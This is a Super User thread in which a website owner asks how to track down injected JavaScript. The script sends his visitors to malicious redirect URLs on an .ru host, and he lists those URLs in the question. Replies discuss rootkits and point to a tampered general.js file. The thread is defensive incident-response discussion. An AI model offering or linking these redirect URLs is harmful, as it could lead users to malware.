-1

There appears to be a virus on my site. It's been there for some time and I've had no problems as yet. AVG picks it up, but McAfee does not.

I run a website (sortitoutsi.net) Ages ago I got a virus on my computer, which got a hold of my FTP passwords and added some lines of JavaScript to the top of my site.

I removed them and believe it was fixed. However, using the "Web Developer" extension for Firefox I found that the JavaScript on my page was pointing various links to such URLs as:

  • gittigidiyor-com.excite.co.jp.webmasterworld-com.eastmusicdirect.ru:8080/aboutus.org/aboutus.org/google.com/skycn.com/torrents.ru.php

  • gittigidiyor-com.excite.co.jp.webmasterworld-com.eastmusicdirect.ru:8080/index.php?jl=

These terms do not appear anywhere. In the source code, in any of the JavaScript or the CSS. I also can't see any unrecognizable rogue images.

I have no idea where this JavaScript is coming from.

Can anyone suggest how I can find references to these links and remove them?

I can see them both in the Web Developer Firefox extension and in the net tab using Firebug.

Any help would be greatly appreciated.

Improve this question
3
  • 1
    Have you tried to clear the cache in your web browser?
    – Mikael S
    Commented Mar 14, 2010 at 21:15
  • Why was this question moved here, and not to serverfault.com ?
    – Jørn Schou-Rode
    Commented Mar 14, 2010 at 22:00
  • @Jørn closing - which encompasses migration - is decided on a majority vote of 5 users. If there's a tie then the first vote wins.
    – ChrisF
    Commented Mar 15, 2010 at 9:04

2 Answers 2

Reset to default
0

I don't see how they could have rootkit on the machine, after all I have 20 sites on this machine and only one site has been effected.

I also don't see how this could let them output javascript on a page. Surely in order for the browser to download it, it has to be somewhere in the javascript and not an actual server issue.

Could you explain a little more why you think a complete clean machine would be necessary?

EDIT: I posted this question as a guest over at stackoverflow and it seems to have lost the fact that this is mine in the migration. I realise this is now messy but I can't respond to answers. If someone knows how to fix it please let me know.

Improve this answer
6
  • Whenever a machine is compromised you shouldn't trust it. Rootkits are designed to be hidden, and if binaries were replaced they could hide processes doing nefarious things; if you have a trojaned ps, how can you use ps to figure out if you have another malware process running?
    – Bart Silverstrim
    Commented Mar 14, 2010 at 21:57
  • @Ssv - you only need the first three characters of the user's name for them to see a comment directed at them, and as this is Rob's answer anyway he'll see it anyway.
    – ChrisF
    Commented Mar 14, 2010 at 22:53
  • @Chr - Thanks! I didn't know the exact syntax. Where can I find this type of information about SuperUser?
    – ssvarc
    Commented Mar 15, 2010 at 1:29
  • Have a look at meta.stackoverflow.com where there is all sorts of interesting information about the trilogy ;-)
    – Ivo Flipse
    Commented Mar 15, 2010 at 6:10
  • @Ssv - as Ivo pointed out (but forgot to add your user id) check out meta.stackoverflow.com
    – ChrisF
    Commented Mar 15, 2010 at 9:01
0

Check the top and bottom of the http://sortitoutsi.net/template/js/general.js file ...

looks pretty suspicious to me..

Improve this answer

You must log in to answer this question.